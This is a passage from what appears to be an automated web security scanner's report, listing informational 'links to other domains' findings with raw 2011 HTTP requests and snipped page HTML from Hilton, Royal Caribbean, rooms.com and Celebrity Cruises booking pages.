Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; wuc=USA; MSIE_ALERT=true; s_cc=true; s_sq=royalcaribbeanprod%3D%2526pid%253DRCI%25253Adealsandmore%25253Ahotdeals%25253Ahotdealsgateway%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.royalcaribbean.com%25252Fbeforeyouboard%25252FgetCountdownToCruise.do%25253FcS%25253DNAVBAR%252526pnav%25253D4%252526snav%25253D6%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 61331
Date: Mon, 03 Oct 2011 12:45:42 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">


   <script type="text/ja
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="https://fls.doubleclick.net/activityi;src=1740393;type=royal441;cat=cound357;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
17.23. https://secure3.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e1s1 HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:53:59 GMT
Content-Length: 28801
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.hotelicopter.com/js/connector.js"></script>
...[SNIP]...
<NOSCRIPT>
       <IFRAME SRC="https://fls.doubleclick.net/activityi;src=2013561;type=globa822;cat=gwr1h149;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
17.24. https://secure3.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en_US/hi/reservation/book.htm?execution=e11s1 HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.558; mmid=-1949538702%7CBQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-1949538702%7CBQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635676679:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:54:20 GMT
Content-Length: 123236
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<?xml version="1.0" encoding="UTF-8"?>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.hotelicopter.com/js/connector.js"></script>
...[SNIP]...
</span>
                   
                   
<a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=2&dn=www.hilton.com&lang=en" target="_blank" onclick="openPopup(this,'560','500','This is a Secure Site');return false;"><img src="/skins/common/img/verisign.gif" alt="This is a Secure Site" class="verisign_logo"/>
...[SNIP]...
<NOSCRIPT>
       <IFRAME SRC="https://fls.doubleclick.net/activityi;src=2013561;type=globa822;cat=globa204;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
17.25. http://vacations.rooms.com/wthrooms/CPGateway  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vacations.rooms.com
Path:   /wthrooms/CPGateway

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /wthrooms/CPGateway?DD=WTHROOMS&fromLocation=&toLocation=New%20York%20City&hotelFromDate=11/10/2011&hotelToDate=11/13/2011&combinationType=H&adultsNum=2&pricepoint=yes&nonDiscountedPricePerNight=339.58&hotelDuration=3&specificHotelName=Wellington%20Hotel&airCompany=&doSearch=T HTTP/1.1
Host: vacations.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://vacations.rooms.com/wthrooms/CPMerchandisingPage?DD=WTHROOMS&headTemplate=DestinationHotelHead&bodyTemplate=NewYorkHotelBody&isShowFramework=true&WT.mc_id=WTHROOMS_NewYorkHotel_032511
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CPcon=SVNmVFhSQUkGLEJtbVVXZUtCVF9WAi9CbGpVUWRQWFJEUhguX2h0T1FiUUZaQlEDLVVka05bZVFH; neatCookie=enabled; CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08; NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317642189940:ss=1317642189940

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:55 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 Oct 2011 12:44:55 GMT
Expires: -1
Set-Cookie: CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08
P3P: CP="NOI DSP LAW NID CUR TAIa CONi OUR STP UNI STA"
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 45038

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Vacation Packages</title>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<!-- [start] WebTrends
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://ctix8.cheaptickets.com/dcsrbjuh3vz5bde9exdeyiy5l_8c1r/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.2">
</noscript>
...[SNIP]...
17.26. http://vacations.rooms.com/wthrooms/CPMerchandisingPage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vacations.rooms.com
Path:   /wthrooms/CPMerchandisingPage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wthrooms/CPMerchandisingPage?DD=WTHROOMS&headTemplate=DestinationHotelHead&bodyTemplate=NewYorkHotelBody&isShowFramework=true&WT.mc_id=WTHROOMS_NewYorkHotel_032511 HTTP/1.1
Host: vacations.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.rooms.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 Oct 2011 12:42:49 GMT
Expires: -1
Set-Cookie: CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08
P3P: CP="NOI DSP LAW NID CUR TAIa CONi OUR STP UNI STA"
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 159531


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

   <title>Vacation Packages</title>
   <meta name="description" content="Vacation
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://ctix8.cheaptickets.com/dcsrbjuh3vz5bde9exdeyiy5l_8c1r/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.2">
</noscript>
...[SNIP]...
</a>
<a href="https://secure.neatgroup.com/wthrooms/CPRetrieveReservedPackages?DD=WTHROOMS"><IMG SRC="ShowImage?scope=WTHROOMS&name=headerbar441" height="41" width="441px" border="0" /></a>
<a href="https://secure.neatgroup.com/wthrooms/CPRetrieveReservedPackages?DD=WTHROOMS"><IMG SRC="ShowImage?scope=WTHROOMS&name=booking155x41" height="41" width="155px" border="0" />
...[SNIP]...
3/2011&combinationType=H&adultsNum=2&pricepoint=yes&nonDiscountedPricePerNight=138.38&hotelDuration=3&specificHotelName=Clarion%20Hotel%20La%20Guardia%20Airport&airCompany=&doSearch=T'; return false;"><img src="http://www.orbitz.com/hotelimages/880/40880/Clarion-Hotel-La-Guardia-Airport-Hotel-Exterior-1_thumb.jpg" onError="replaceWithDefaultImage(this)"/></a>
...[SNIP]...
/2011&hotelToDate=11/13/2011&combinationType=H&adultsNum=2&pricepoint=yes&nonDiscountedPricePerNight=339.58&hotelDuration=3&specificHotelName=Wellington%20Hotel&airCompany=&doSearch=T'; return false;"><img src="http://www.orbitz.com/hotelimages/346/12346/Wellington-Hotel-Hotel-Exterior-9_thumb.jpg" onError="replaceWithDefaultImage(this)"/></a>
...[SNIP]...
/10/2011&hotelToDate=11/13/2011&combinationType=H&adultsNum=2&pricepoint=yes&nonDiscountedPricePerNight=275.73&hotelDuration=3&specificHotelName=Skyline%20Hotel&airCompany=&doSearch=T'; return false;"><img src="http://www.orbitz.com/hotelimages/978/28978/Skyline-Hotel-Hotel-Exterior-7_thumb.jpg" onError="replaceWithDefaultImage(this)"/></a>
...[SNIP]...
elToDate=11/13/2011&combinationType=H&adultsNum=2&pricepoint=yes&nonDiscountedPricePerNight=404.97&hotelDuration=3&specificHotelName=Park%20Central%20New%20York&airCompany=&doSearch=T'; return false;"><img src="http://www.orbitz.com/hotelimages/247/11247/Park-Central-New-York-Hotel-Exterior-3_thumb.jpg" onError="replaceWithDefaultImage(this)"/></a>
...[SNIP]...
lToDate=11/13/2011&combinationType=H&adultsNum=2&pricepoint=yes&nonDiscountedPricePerNight=316.05&hotelDuration=3&specificHotelName=Mayfair%20New%20York%20Hotel&airCompany=&doSearch=T'; return false;"><img src="http://www.orbitz.com/public/hotelthumbnails/4/40/50440/50440_TBNL_1313684009270.jpg" onError="replaceWithDefaultImage(this)"/></a>
...[SNIP]...
2011&hotelToDate=11/13/2011&combinationType=H&adultsNum=2&pricepoint=yes&nonDiscountedPricePerNight=373.44&hotelDuration=3&specificHotelName=Affinia%20Manhattan&airCompany=&doSearch=T'; return false;"><img src="http://www.orbitz.com/hotelimages/776/62776/Affinia-Manhattan-Hotel-Exterior-1_thumb.jpg" onError="replaceWithDefaultImage(this)"/></a>
...[SNIP]...
2011&combinationType=H&adultsNum=2&pricepoint=yes&nonDiscountedPricePerNight=336.79&hotelDuration=3&specificHotelName=Hilton%20Garden%20Inn%20New%20York/Chelsea&airCompany=&doSearch=T'; return false;"><img src="http://www.orbitz.com/hotelimages/904/219904/Hilton-Garden-Inn-New-YorkChelsea-Hotel-Exterior-1_thumb.jpg" onError="replaceWithDefaultImage(this)"/></a>
...[SNIP]...
17.27. http://vacations.rooms.com/wthrooms/HotelDetails  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vacations.rooms.com
Path:   /wthrooms/HotelDetails

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wthrooms/HotelDetails?DD=WTHROOMS&searchId=-755244140&packageIndex=0 HTTP/1.1
Host: vacations.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://vacations.rooms.com/wthrooms/CPGateway?DD=WTHROOMS&fromLocation=&toLocation=New%20York%20City&hotelFromDate=11/10/2011&hotelToDate=11/13/2011&combinationType=H&adultsNum=2&pricepoint=yes&nonDiscountedPricePerNight=339.58&hotelDuration=3&specificHotelName=Wellington%20Hotel&airCompany=&doSearch=T
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CPcon=SVNmVFhSQUkGLEJtbVVXZUtCVF9WAi9CbGpVUWRQWFJEUhguX2h0T1FiUUZaQlEDLVVka05bZVFH; neatCookie=enabled; CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08; NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317642189940:ss=1317642189940

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 Oct 2011 12:45:02 GMT
Expires: -1
Set-Cookie: CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08
P3P: CP="NOI DSP LAW NID CUR TAIa CONi OUR STP UNI STA"
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 47082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>


<!-- Title -->


   <title>Hotels</title>


<!-- Tagg
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://ctix8.cheaptickets.com/dcsrbjuh3vz5bde9exdeyiy5l_8c1r/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.2">
</noscript>
...[SNIP]...
</a>
<a href="https://secure.neatgroup.com/wthrooms/CPRetrieveReservedPackages?DD=WTHROOMS"><IMG SRC="http://www.rooms.com/images_unique/rooms/header/cap_right-wide596.gif" height="41" width="576px" border="0" />
...[SNIP]...
17.28. http://vacations.rooms.com/wthrooms/Search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vacations.rooms.com
Path:   /wthrooms/Search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wthrooms/Search?DD=WTHROOMS HTTP/1.1
Host: vacations.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://vacations.rooms.com/wthrooms/HotelDetails?sort=&DD=WTHROOMS&redirect=&loginRequired=NO&doRestore=YES&buttonPurchase=Yes&searchId=-755244140&packageIndex=0&activeTabName=&Components=H&packageIdx=&IsValidLocation=true&errMsgs=&previousToLocation=&isPreviousSearchTypeHC=false&datehotelFromDate=11%2F10%2F11&datehotelToDate=11%2F13%2F11&adults2=2&adults1=2&minors1=0&minors2=0&rooms=1&toLocation=New+York+City%2C+New+York%2C+United+States
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CPcon=SVNmVFhSQUkGLEJtbVVXZUtCVF9WAi9CbGpVUWRQWFJEUhguX2h0T1FiUUZaQlEDLVVka05bZVFH; neatCookie=enabled; CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08; NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317642334104:ss=1317642189940

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:19 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 Oct 2011 12:45:19 GMT
Expires: -1
Set-Cookie: CDENsession=FDRVveQ8udzW8jyomZntxQvof.CEGDEN10
P3P: CP="NOI DSP LAW NID CUR TAIa CONi OUR STP UNI STA"
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 126820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>


<!-- Title -->


   <title>Vacation Packages</title>



...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://ctix8.cheaptickets.com/dcsrbjuh3vz5bde9exdeyiy5l_8c1r/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.2">
</noscript>
...[SNIP]...
</a>
<a href="https://secure.neatgroup.com/wthrooms/CPRetrieveReservedPackages?DD=WTHROOMS"><IMG SRC="http://www.rooms.com/images_unique/rooms/header/cap_right-wide596.gif" height="41" width="576px" border="0" />
...[SNIP]...
17.29. http://www.celebritycruises.com/explore/ships/detail.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /explore/ships/detail.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /explore/ships/detail.do?shipCode=SI&tab=sailings%2Fexplore%2Fships%2Fsailings.do%3Fpagename%3Dship_SI%26shipCode%3DSI&cS=Homepage&ICID=Cel_11Q4_web_hp_body_Silhouette_US HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20s_cc%3Dtrue%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dcelebritycruiseprod%253D%252526pid%25253Dhomepageus%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.celebritycruises.com%2525252Fexplore%2525252Fships%2525252Fdetail.do%2525253FshipCode%2525253DSI%25252526tab%2525253Dsailings%252525252Fexplore%252525252Fships%252525252%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 74931
Date: Mon, 03 Oct 2011 12:47:12 GMT
Connection: close


   <!DOCTYPE html>
<html>
   <head>
       <meta charset="utf-8">
       
           
                           <title>Celebrity Silhouette | Celebrity Cruises</title>
   <meta property="og:ti
...[SNIP]...
<li><a href="http://www.cruisingpower.com?ICID=Cel_11Q4_web_hp_ftr_cpower&cS=Footer" >
                                   Cruising Power
                               </a>
...[SNIP]...
<dd><a href="http://www.facebook.com/celebritycruises" target="_blank" >
               <img src="http://media.celebritycruises.com/celebrity/content/en_US/images/cel_homepage/facebook.png" name="related_topic~~2~~icon_image" alt="Celebrity Cruises Facebook" border="0"/>
...[SNIP]...
<dd><a href="http://www.youtube.com/user/CELEBRITYCRUISES#p/p/16EA4FFCE82039C4/0/uLX1sUddLCA&cS=socialMedia2&ICID=CEL_10Q4_Web_HP_YouTube" target="_blank" >
               <img src="http://media.celebritycruises.com/celebrity/content/en_US/images/cel_homepage/youtube.png" name="related_topic~~3~~icon_image" alt="Celebrity Cruises YouTube" border="0"/>
...[SNIP]...
<dd><a href="http://twitter.com/celebrityuk" target="_blank" >
               <img src="http://media.celebritycruises.com/celebrity/content/en_US/images/cel_homepage/twitter.png" name="related_topic~~4~~icon_image" alt="Celebrity Cruises Twitter" border="0"/>
...[SNIP]...
17.30. http://www.celebritycruises.com/search/vacationSearchResults.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebritycruises.com
Path:   /search/vacationSearchResults.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/vacationSearchResults.do?isWidget=false&dest=ANY&sailStartDate=ANY&sailEndDate=ANY&ship=ANY&port=ANY&duration=ANY&includeAdjascentPorts=Y&promoid=&promoType=&promotionTypeId=&priceProgram=&sortBy=4&startRow=0&count=10&cruiseType=CO&cruiseInt=Y&isCrieriaExcluded= HTTP/1.1
Host: www.celebritycruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.celebritycruises.com/search/loadCruiseConfigurator.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 85160
Date: Mon, 03 Oct 2011 12:47:21 GMT
Connection: close


   <!DOCTYPE html>
<html>
   <head>
       <meta charset="utf-8">
       
           
                           <title>Plan and Book</title>
   <meta property="og:title" content="Plan and Book
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2562825;type=searc600;cat=searc882;ord=1?" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
</body> tags, as close as possible to the opening tag.
Creation Date: 04/12/2011
-->
<iframe src="http://fls.doubleclick.net/activityi;src=2562825;type=searc600;cat=livep349;ord=1;num=[Random Number]?" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
<li><a href="http://www.cruisingpower.com?ICID=Cel_11Q4_web_hp_ftr_cpower&cS=Footer" >
                                   Cruising Power
                               </a>
...[SNIP]...
<dd><a href="http://www.facebook.com/celebritycruises" target="_blank" >
               <img src="http://media.celebritycruises.com/celebrity/content/en_US/images/cel_homepage/facebook.png" name="related_topic~~2~~icon_image" alt="Celebrity Cruises Facebook" border="0"/>
...[SNIP]...
<dd><a href="http://www.youtube.com/user/CELEBRITYCRUISES#p/p/16EA4FFCE82039C4/0/uLX1sUddLCA&cS=socialMedia2&ICID=CEL_10Q4_Web_HP_YouTube" target="_blank" >
               <img src="http://media.celebritycruises.com/celebrity/content/en_US/images/cel_homepage/youtube.png" name="related_topic~~3~~icon_image" alt="Celebrity Cruises YouTube" border="0"/>
...[SNIP]...
<dd><a href="http://twitter.com/celebrityuk" target="_blank" >
               <img src="http://media.celebritycruises.com/celebrity/content/en_US/images/cel_homepage/twitter.png" name="related_topic~~4~~icon_image" alt="Celebrity Cruises Twitter" border="0"/>
...[SNIP]...
17.31. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /widgets/fan.php?api_key=09addd37a06e06e413d53e5411603783&channel_url=http%3A%2F%2Fwww.cruisesonly.com%2F%3Ffbc_channel%3D1&id=50243286972&name=&width=280&connections=0&stream=&logobar=&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
